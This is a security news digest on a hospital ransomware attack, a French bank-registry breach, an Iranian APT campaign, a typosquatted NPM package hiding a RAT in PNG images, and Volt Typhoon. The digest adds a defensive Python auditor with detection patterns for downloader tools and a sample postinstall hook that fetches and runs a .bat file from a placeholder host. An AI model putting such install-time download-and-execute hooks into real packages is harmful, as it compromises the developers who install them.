Ransomware Attack Forces Mississippi’s Largest Health System to Shut Down Statewide Clinics
The University of Mississippi Medical Center (UMMC), the state’s only academic medical center, was hit by a ransomware attack in the early hours of February 19th that knocked out its entire IT network — including the Epic electronic health records platform, phone systems, and booking infrastructure. In response, UMMC shut down all 35 of its clinics statewide, canceled elective procedures and surgeries, and shifted staff to pen-and-paper documentation. Mississippi MED-COM, the statewide hospital transfer coordination network, was also impacted, though patient routing continued thanks to built-in redundancies.
Attacker Breaches France’s National Bank Account Registry, Exposing 1.2 Million Accounts
France’s Ministry of Economy disclosed last week that a threat actor accessed FICOBA — the country’s centralized national bank account registry — in late January by impersonating a civil servant and leveraging stolen credentials to query the database. The exposed data for approximately 1.2 million accounts includes IBANs, account holder names and addresses, and in some cases tax identification numbers. Officials were careful to note the breach did not allow access to account balances or the ability to execute transactions, though security experts warn the stolen data is more than sufficient to enable targeted phishing campaigns, identity theft, and fraudulent direct debit setups.
MuddyWater Launches “Operation Olalampo” Against MENA Organizations with New Malware Arsenal
Researchers at Group-IB have published findings on a new campaign by Iran-linked APT MuddyWater (aka Mango Sandstorm, Earth Vetala), dubbed Operation Olalampo, which has been targeting organizations and individuals across the Middle East and North Africa since late January 2026. The campaign introduces several new malware families, including the GhostFetch first-stage downloader, a GhostBackDoor second-stage implant, HTTP_VIP (a native downloader that deploys AnyDesk for remote access), and CHAR — a Rust-based backdoor that receives commands via a Telegram bot. Initial access follows MuddyWater’s established playbook: spear-phishing emails carrying Microsoft Office documents with malicious macros.
Malicious NPM Package Hides Pulsar RAT Inside PNG Images to Evade Detection
Veracode Threat Research has detailed a cleverly crafted supply chain attack in which a typosquatting NPM package named “buildrunner-dev” — designed to impersonate the dormant legitimate “buildrunner” package — delivers the Pulsar Remote Access Trojan to developer systems. The attack combines typosquatting with steganography and process hollowing: the package downloads a batch file at install time from a Codeberg repository, which then extracts a PowerShell AMSI bypass and the full Pulsar RAT payload hidden within the pixel data of PNG images hosted on a public image hosting service. This approach keeps the malicious package itself technically clean of any payload, making static analysis nearly ineffective.
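Two of the warning signs in this case are visible in the package manifest before anything runs: a name that is one edit away from a legitimate package, and a lifecycle script that reaches out to the network at install time. The following audit script is an added example written for this digest, not code from Veracode or from the packages involved; the manifest, the allow-list of known package names, and the URL are constructed placeholders. It generalizes the case slightly by comparing a package name against any allow-list of trusted names rather than just "buildrunner".

```python
"""Audit an npm package.json for typosquat-style names and install-time downloaders."""
import json
import re
from difflib import SequenceMatcher

# Lifecycle hooks that npm runs automatically during `npm install`.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Indicators that a lifecycle script fetches or launches remote content.
RISKY_PATTERNS = {
    "remote_url": re.compile(r"https?://", re.I),
    "downloader": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|bitsadmin)\b", re.I),
    "shell_launcher": re.compile(r"\b(powershell|pwsh|cmd(\.exe)?|sh|bash)\b", re.I),
    "script_file": re.compile(r"\.(bat|cmd|ps1)\b", re.I),
}

# Constructed allow-list of package names the organization already trusts.
KNOWN_PACKAGES = ["buildrunner", "lodash", "express", "react"]


def lookalike_names(name, known=KNOWN_PACKAGES, threshold=0.8):
    """Return (known_name, similarity) pairs for trusted names this one closely resembles."""
    hits = []
    for candidate in known:
        if candidate == name:
            continue  # an exact match is the real package, not a lookalike
        score = SequenceMatcher(None, name, candidate).ratio()
        if score >= threshold:
            hits.append((candidate, round(score, 3)))
    return sorted(hits, key=lambda pair: -pair[1])


def risky_lifecycle_scripts(scripts):
    """Map each install-time hook to the list of risky indicators found in its command."""
    findings = {}
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # `test`, `build` etc. do not run on install
        matched = [label for label, rx in RISKY_PATTERNS.items() if rx.search(command)]
        if matched:
            findings[hook] = matched
    return findings


def audit_manifest(manifest_text):
    """Parse a package.json string and report name lookalikes and risky install hooks."""
    manifest = json.loads(manifest_text)
    name = manifest.get("name", "")
    scripts = manifest.get("scripts", {}) or {}
    return {
        "name": name,
        "lookalikes": lookalike_names(name),
        "risky_hooks": risky_lifecycle_scripts(scripts),
    }


# Constructed sample manifest modelled on the pattern described above (placeholder URL).
SAMPLE_MANIFEST = json.dumps({
    "name": "buildrunner-dev",
    "version": "1.0.3",
    "scripts": {
        "postinstall": "curl -sSL https://example.invalid/setup.bat -o setup.bat && cmd /c setup.bat",
        "test": "echo ok",
    },
})

if __name__ == "__main__":
    print(json.dumps(audit_manifest(SAMPLE_MANIFEST), indent=2))
```

Run this against the manifests in `node_modules` after a dry-run install, or wire it into CI as a pre-merge check on lockfile changes; a non-empty `lookalikes` or `risky_hooks` result is a reason to hold the dependency for manual review rather than a verdict on its own.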
Volt Typhoon Still Embedded in U.S. Critical Infrastructure — Some Compromises May Never Be Found
OT security firm Dragos warned in its annual report that Chinese state-sponsored hackers tied to the Volt Typhoon operation continued actively targeting and compromising U.S. utilities throughout 2025 and remain active today, despite years of public disclosure and law enforcement disruption efforts. Dragos CEO Rob Lee told reporters the group is “absolutely still mapping out and getting into U.S. infrastructure,” and raised a sobering possibility: for lower-resourced critical infrastructure organizations, particularly those in the water sector, some Volt Typhoon compromises may never be found. The group’s use of living-off-the-land techniques and valid credentials makes detection extraordinarily difficult even for well-equipped defenders.